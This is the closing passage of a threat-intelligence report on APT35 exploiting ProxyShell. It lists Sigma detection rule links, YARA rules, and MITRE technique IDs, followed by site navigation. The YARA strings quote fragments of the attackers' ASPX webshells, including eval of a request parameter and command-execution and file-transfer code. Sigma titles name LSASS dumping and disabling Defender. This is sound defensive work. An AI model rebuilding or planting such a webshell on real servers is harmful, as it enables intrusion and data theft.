noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_net_user_add.yml</a></p> <p>Netsh Port or Application Allowed – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_fw_add.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_fw_add.yml</a></p> <p>Netsh RDP Port Opening – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_allow_port_rdp.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_allow_port_rdp.yml</a></p> <p>Non Interactive PowerShell – <a href="https://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershell.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershell.yml</a></p> <p>Powershell Defender Exclusion – <a href="https://github.com/SigmaHQ/sigma/blob/682e0458a336c3a6e93b18f7e972e1d67ef01598/rules/windows/process_creation/win_powershell_defender_exclusion.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/682e0458a336c3a6e93b18f7e972e1d67ef01598/rules/windows/process_creation/win_powershell_defender_exclusion.yml</a></p> <p>PowerShell Get-Process LSASS – <a href="https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_susp_powershell_getprocess_lsass.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_susp_powershell_getprocess_lsass.yml</a></p> <p>Process Dump via Comsvcs DLL – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_susp_comsvcs_procdump.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_susp_comsvcs_procdump.yml</a></p> <p>Quick Execution of a Series of Suspicious Commands – <a href="https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_multiple_suspicious_cli.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_multiple_suspicious_cli.yml</a></p> <p>Rare Scheduled Task Creations – <a href="https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/other/taskscheduler/win_rare_schtask_creation.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/other/taskscheduler/win_rare_schtask_creation.yml</a></p> <p>Service Execution – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_service_execution.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_service_execution.yml</a></p> <p>Shells Spawned by Web Servers – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_webshell_spawn.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_webshell_spawn.yml</a></p> <p>Suspicious PowerShell Parent Process – <a href="https://github.com/SigmaHQ/sigma/blob/6f5271275e9ac22be9ded8b9252bce064e524153/rules/windows/process_creation/win_susp_powershell_parent_process.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/6f5271275e9ac22be9ded8b9252bce064e524153/rules/windows/process_creation/win_susp_powershell_parent_process.yml</a></p> <p>Suspicious Script Execution From Temp Folder – <a href="https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_susp_script_exec_from_temp.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_susp_script_exec_from_temp.yml</a></p> <p>Wdigest Enable UseLogonCredential – <a href="https://github.com/SigmaHQ/sigma/blob/503df469687fe4d14d2119a95723485d079ec0d9/rules/windows/registry_event/sysmon_wdigest_enable_uselogoncredential.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/503df469687fe4d14d2119a95723485d079ec0d9/rules/windows/registry_event/sysmon_wdigest_enable_uselogoncredential.yml</a></p> <p>Webshell Detection With Command Line Keywords – <a href="https://github.com/SigmaHQ/sigma/blob/1cfca93354d25e458db40f8d48403602b46bbf03/rules/windows/process_creation/win_webshell_detection.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/1cfca93354d25e458db40f8d48403602b46bbf03/rules/windows/process_creation/win_webshell_detection.yml</a></p> <p>Windows Defender Real-Time Protection Disabled – <a href="https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml</a></p> <p>Windows Defender Threat Detection Disabled – <a href="https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_disabled.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_disabled.yml</a></p> <p>Windows Shell Spawning Suspicious Program – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_shell_spawn_susp_program.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_shell_spawn_susp_program.yml</a></p> <p>Windows Suspicious Use Of Web Request in CommandLine – <a href="https://github.com/SigmaHQ/sigma/blob/98d7380a40d503ffd225420f7318b79d9f5097b8/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/98d7380a40d503ffd225420f7318b79d9f5097b8/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml</a></p> <p>Windows Webshell Creation – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/file_event/sysmon_webshell_creation_detect.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/file_event/sysmon_webshell_creation_detect.yml</a></p> <h3 class="wp-block-heading">Yara</h3> <pre>rule files_dhvqx { meta: description = "9893_files - file dhvqx.aspx" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "c5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8" strings: $s1 = "eval(Request['exec_code'],'unsafe');Response.End;" fullword ascii $s2 = "6<script language='JScript' runat='server'>" fullword ascii $s3 = "AEALAAAAAAAAAAA" fullword ascii $s4 = "AFAVAJA" fullword ascii $s5 = "AAAAAAV" fullword ascii $s6 = "LAAAAAAA" fullword ascii $s7 = "ANAZAQA" fullword ascii $s8 = "ALAAAAA" fullword ascii $s9 = "AAAAAEA" ascii $s10 = "ALAHAUA" fullword ascii condition: uint16(0) == 0x4221 and filesize < 800KB and ($s1 and $s2) and 4 of them } rule aspx_dyukbdcxjfi { meta: description = "9893_files - file aspx_dyukbdcxjfi.aspx" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "84f77fc4281ebf94ab4897a48aa5dd7092cc0b7c78235965637eeef0908fb6c7" strings: $s1 = "string[] commands = exec_code.Substring(\"run \".Length).Split(new[] { ';' }, StringSplitOptions.RemoveEmpty" ascii $s2 = "string[] commands = exec_code.Substring(\"run \".Length).Split(new[] { ';' }, StringSplitOptions.RemoveEmpty" ascii $s3 = "var dstFile = Path.Combine(dstDir, Path.GetFileName(httpPostedFile.FileName));" fullword ascii $s4 = "info.UseShellExecute = false;" fullword ascii $s5 = "using (StreamReader streamReader = process.StandardError)" fullword ascii $s6 = "return httpPostedFile.FileName + \" Uploaded to: \" + dstFile;" fullword ascii $s7 = "else if (exec_code.StartsWith(\"download \"))" fullword ascii $s8 = "string[] parts = exec_code.Substring(\"download \".Length).Split(' ');" fullword ascii $s9 = "Response.AppendHeader(\"Content-Disposition\", \"attachment; filename=\" + fileName);" fullword ascii $s10 = "result = result + Environment.NewLine + \"ERROR:\" + Environment.NewLine + error;" fullword ascii $s11 = "else if (exec_code == \"get\")" fullword ascii $s12 = "int fileLength = httpPostedFile.ContentLength;" fullword ascii condition: uint16(0) == 0x4221 and filesize < 800KB and 8 of them } rule files_user { meta: description = "9893_files - file user.exe" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b" strings: $x1 = "PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVer" ascii $s2 = "\", or \"requireAdministrator\" --> <v3:requestedExecutionLevel level=\"requireAdministrator\" /> </v3:requestedPrivileges> </v3" ascii $s3 = "-InitOnceExecuteOnce" fullword ascii $s4 = "0\"> <dependency> <dependentAssembly> <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0." ascii $s5 = "s:v3=\"urn:schemas-microsoft-com:asm.v3\"> <v3:security> <v3:requestedPrivileges> <!-- level can be \"asInvoker\", \"highestAvai" ascii $s6 = "PB_GadgetStack_%I64i" fullword ascii $s7 = "PB_DropAccept" fullword ascii $s8 = "rocessorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" /> </dependentAssembly> </dependency> <v3:trustInf" ascii $s9 = "PB_PostEventMessage" fullword ascii $s10 = "PB_WindowID" fullword ascii $s11 = "?GetLongPathNameA" fullword ascii $s12 = "Memory page error" fullword ascii $s13 = "PPPPPPH" fullword ascii $s14 = "YZAXAYH" fullword ascii $s15 = "%d:%I64d:%I64d:%I64d" fullword ascii $s16 = "NGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDI" ascii $s17 = "PYZAXAYH" fullword ascii $s18 = "PB_MDI_Gadget" fullword ascii $s19 = "PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVer" ascii $s20 = " 46B722FD25E69870FA7711924BC5304D 787242D55F2C49A23F5D97710D972108 A2DB26CE3BBE7B2CB12F9BEFB37891A3" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) and 4 of them } rule task_update { meta: description = "9893_files - file task_update.exe" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a" strings: $x1 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersi" ascii $s2 = " or \"requireAdministrator\" --> <v3:requestedExecutionLevel level=\"requireAdministrator\" /> </v3:requestedPrivileges> </v3:se" ascii $s3 = "-InitOnceExecuteOnce" fullword ascii $s4 = "> <dependency> <dependentAssembly> <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0" ascii $s5 = "v3=\"urn:schemas-microsoft-com:asm.v3\"> <v3:security> <v3:requestedPrivileges> <!-- level can be \"asInvoker\", \"highestAvaila" ascii $s6 = "PB_GadgetStack_%I64i" fullword ascii $s7 = "PB_DropAccept" fullword ascii $s8 = "PB_PostEventMessage" fullword ascii $s9 = "PB_WindowID" fullword ascii $s10 = "?GetLongPathNameA" fullword ascii $s11 = "cessorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" /> </dependentAssembly> </dependency> <v3:trustInfo " ascii $s12 = "Memory page error" fullword ascii $s13 = "PPPPPPH" fullword ascii $s14 = "YZAXAYH" fullword ascii $s15 = "%d:%I64d:%I64d:%I64d" fullword ascii $s16 = "PYZAXAYH" fullword ascii $s17 = "PB_MDI_Gadget" fullword ascii $s18 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersi" ascii $s19 = " 11FCC18FB2B55FC3C988F6A76FCF8A2D 56D49E57AD1A051BF62C458CD6F3DEA9 6104990DFEA3DFAB044FAF960458DB09" fullword wide $s20 = "PostEventClass" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) and 4 of them } rule App_Web_vjloy3pa { meta: description = "9893_files - file App_Web_vjloy3pa.dll" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "faa315db522d8ce597ac0aa957bf5bde31d91de94e68d5aefac4e3e2c11aa970" strings: $x2 = "hSystem.ComponentModel.DataAnnotations, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s3 = "MSystem.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s4 = "RSystem.Xml.Linq, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s5 = "ZSystem.ServiceModel.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s6 = "YSystem.Web.DynamicData, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s7 = "XSystem.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s8 = "VSystem.Web.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s9 = "MSystem.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s10 = "WSystem.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s11 = "`System.Data.DataSetExtensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s12 = "NSystem.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s13 = "ZSystem.WorkflowServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s14 = "WSystem.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" fullword ascii $s15 = "aSystem.ServiceModel.Activation, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s16 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" wide /* base64 encoded string '' */ $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" wide /* base64 encoded string '' */ $s18 = "aSystem.Web.ApplicationServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" fullword ascii $s19 = "\\System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii $s20 = "SMicrosoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and 1 of ($x*) and 4 of them } rule _user_task_update_0 { meta: description = "9893_files - from files user.exe, task_update.exe" author = "TheDFIRReport" reference = "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/" date = "2022-03-21" hash1 = "7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b" hash2 = "12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a" strings: $s1 = "-InitOnceExecuteOnce" fullword ascii $s2 = "PB_GadgetStack_%I64i" fullword ascii $s3 = "PB_DropAccept" fullword ascii $s4 = "PB_PostEventMessage" fullword ascii $s5 = "PB_WindowID" fullword ascii $s6 = "?GetLongPathNameA" fullword ascii $s7 = "Memory page error" fullword ascii $s8 = "PPPPPPH" fullword ascii $s9 = "YZAXAYH" fullword ascii $s10 = "%d:%I64d:%I64d:%I64d" fullword ascii $s11 = "PYZAXAYH" fullword ascii $s12 = "PB_MDI_Gadget" fullword ascii $s13 = "PostEventClass" fullword ascii $s14 = "t$hYZAXAYH" fullword ascii $s15 = "$YZAXAYH" fullword ascii $s16 = "Floating-point underflow (exponent too small)" fullword ascii $s17 = "Inexact floating-point result" fullword ascii $s18 = "Single step trap" fullword ascii $s19 = "Division by zero (floating-point)" fullword ascii $s20 = "tmHcI(H" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and ( 8 of them ) ) or ( all of them )<br />}</pre> <h3>MITRE</h3> <ul class="wp-block-list"> <li>Exploit Public-Facing Application – T1190</li> <li>OS Credential Dumping – T1003</li> <li>Account Manipulation – T1098</li> <li>Valid Accounts – T1078</li> <li>Ingress Tool Transfer – T1105</li> <li>Match Legitimate Name or Location – T1036.005</li> <li>Windows Service – T1543.003</li> <li>Web Shell – T1505.003</li> <li>System Information Discovery – T1082</li> <li>System Network Configuration Discovery – T1016</li> <li>System Owner/User Discovery – T1033</li> <li>Windows Command Shell – T1059.003</li> </ul> <p>Internal case #9893</p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-5981" class="share-twitter sd-button share-icon" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/?share=twitter" target="_blank" title="Click to share on Twitter" ><span>Twitter</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-5981" class="share-linkedin sd-button share-icon" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/?share=linkedin" target="_blank" title="Click to share on LinkedIn" ><span>LinkedIn</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/?share=reddit" target="_blank" title="Click to share on Reddit" ><span>Reddit</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-5981" class="share-facebook sd-button share-icon" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/?share=facebook" target="_blank" title="Click to share on Facebook" ><span>Facebook</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp" ><span>WhatsApp</span></a></li><li class="share-end"></li></ul></div></div></div> <div id='jp-relatedposts' class='jp-relatedposts' > <h3 class="jp-relatedposts-headline"><em>Related</em></h3> </div> </div><!-- .entry-content --> <footer class="entry-footer"> <div class="entry-meta"> </div><!-- .entry-meta --> </footer><!-- .entry-footer --> </div><!-- .entry-content-holder --> </article><!-- #post-5981 --> <nav class="navigation post-navigation" aria-label="Posts"> <h2 class="screen-reader-text">Post navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://thedfirreport.com/2022/03/07/2021-year-in-review/" rel="prev">2021 Year In Review</a></div><div class="nav-next"><a href="https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/" rel="next">Stolen Images Campaign Ends in Conti Ransomware</a></div></div> </nav> </main><!-- #main --> </div><!-- #primary --> <aside id="secondary" class="widget-area"> <section id="search-4" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://thedfirreport.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search …" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></section><section id="google_translate_widget-5" class="widget widget_google_translate_widget"><div id="google_translate_element"></div></section><section id="block-7" class="widget widget_block"> <div class="wp-block-jetpack-subscriptions__supports-newline wp-block-jetpack-subscriptions"> <div class="wp-block-jetpack-subscriptions__container is-not-subscriber"> <form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="175340963" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog" > <div class="wp-block-jetpack-subscriptions__form-elements"> <p id="subscribe-email"> <label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text" > Type your email… </label> <input required="required" type="email" name="email" class="no-border-radius " style="font-size: 16px;padding: 15px 23px 15px 23px;border-radius: 0px;border-width: 1px;" placeholder="Type your email…" value="" id="subscribe-field" title="Please fill in this field." /> </p> <p id="subscribe-submit" > <input type="hidden" name="action" value="subscribe"/> <input type="hidden" name="blog_id" value="175340963"/> <input type="hidden" name="source" value="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/"/> <input type="hidden" name="sub-type" value="subscribe-block"/> <input type="hidden" name="app_source" value=""/> <input type="hidden" name="redirect_fragment" value="subscribe-blog"/> <input type="hidden" name="lang" value="en_US"/> <input type="hidden" id="_wpnonce" name="_wpnonce" value="a241c0962e" /><input type="hidden" name="_wp_http_referer" value="/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" /><input type="hidden" name="post_id" value="5981"/> <button type="submit" class="wp-block-button__link no-border-radius" style="font-size: 16px;padding: 15px 23px 15px 23px;margin: 0; margin-left: 10px;border-radius: 0px;border-width: 1px;" name="jetpack_subscriptions_widget" > Subscribe </button> </p> </div> </form> </div> </div> </section><section id="block-21" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://the-dfir-report-store.myshopify.com/products/dfir-labs-ctf-july-6-16-00-20-00-utc"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2024/06/ctf-1.png" alt="" class="wp-image-35571 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2024/06/ctf-1.png 200w, https://thedfirreport.com/wp-content/uploads/2024/06/ctf-1-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h4 class="wp-block-heading"><a href="https://the-dfir-report-store.myshopify.com/products/dfir-labs-ctf-july-6-16-00-20-00-utc">Register For Our Next CTF</a></h4> </div></div> </section><section id="block-8" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/monitor5-s.png" alt="" class="wp-image-21332 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/monitor5-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/monitor5-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/" data-type="link" data-id="https://thedfirreport.com/">Reports</a></h3> </div></div> </section><section id="block-9" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/threat-intelligence/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/cloud4-s.png" alt="" class="wp-image-21334 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/cloud4-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/cloud4-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></h3> </div></div> </section><section id="block-10" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/detection-rules/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/warning4-s.png" alt="" class="wp-image-21336 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/warning4-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/warning4-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></h3> </div></div> </section><section id="block-16" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/dfir-labs/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2024/04/labs-s.png" alt="" class="wp-image-31051 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2024/04/labs-s.png 200w, https://thedfirreport.com/wp-content/uploads/2024/04/labs-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a></h3> </div></div> </section><section id="block-12" class="widget widget_block"> <div class="wp-block-media-text" style="grid-template-columns:15% auto"><figure class="wp-block-media-text__media"><a href="https://thedfirreport.com/services/mentoring-coaching-program/"><img loading="lazy" decoding="async" width="200" height="200" src="https://thedfirreport.com/wp-content/uploads/2023/09/help4-s.png" alt="" class="wp-image-21333 size-full" srcset="https://thedfirreport.com/wp-content/uploads/2023/09/help4-s.png 200w, https://thedfirreport.com/wp-content/uploads/2023/09/help4-s-150x150.png 150w" sizes="auto, (max-width: 200px) 100vw, 200px" /></a></figure><div class="wp-block-media-text__content"> <h3 class="wp-block-heading"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring and Coaching</a></h3> </div></div> </section></aside><!-- #secondary --> </div><!-- .wrap .wrap-width--> </div><!-- .site-content-cell --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="copyright-area"> <div class="wrap"> <div class="site-info"> <a href="https://wordpress.org/"> Proudly powered by WordPress</a> <span class="sep"> | </span> Copyright 2023 | The DFIR Report | All Rights Reserved </div><!-- .site-info --> <div class="footer-right-info"> </div> </div><!-- .wrap --> </div><!-- .copyright-area --> </footer><!-- #colophon --> <button href="#" class="back-to-top" type="button"><i class="fa-solid fa-arrow-up-long"></i>Go Top</button> </div><!-- #page --> <script type="text/javascript"> window.WPCOM_sharing_counts = {"https:\/\/thedfirreport.com\/2022\/03\/21\/phosphorus-automates-initial-access-using-proxyshell\/":5981}; </script> <style id='jetpack-block-subscriptions-inline-css' type='text/css'> .is-style-compact .is-not-subscriber .wp-block-button__link,.is-style-compact .is-not-subscriber .wp-block-jetpack-subscriptions__button{border-end-start-radius:0!important;border-start-start-radius:0!important;margin-inline-start:0!important}.is-style-compact .is-not-subscriber .components-text-control__input,.is-style-compact .is-not-subscriber p#subscribe-email input[type=email]{border-end-end-radius:0!important;border-start-end-radius:0!important}.is-style-compact:not(.wp-block-jetpack-subscriptions__use-newline) .components-text-control__input{border-inline-end-width:0!important}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form-container{display:flex;flex-direction:column}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline:not(.wp-block-jetpack-subscriptions__use-newline) .is-not-subscriber .wp-block-jetpack-subscriptions__form-elements{align-items:flex-start;display:flex}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline:not(.wp-block-jetpack-subscriptions__use-newline) p#subscribe-submit{display:flex;justify-content:center}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield 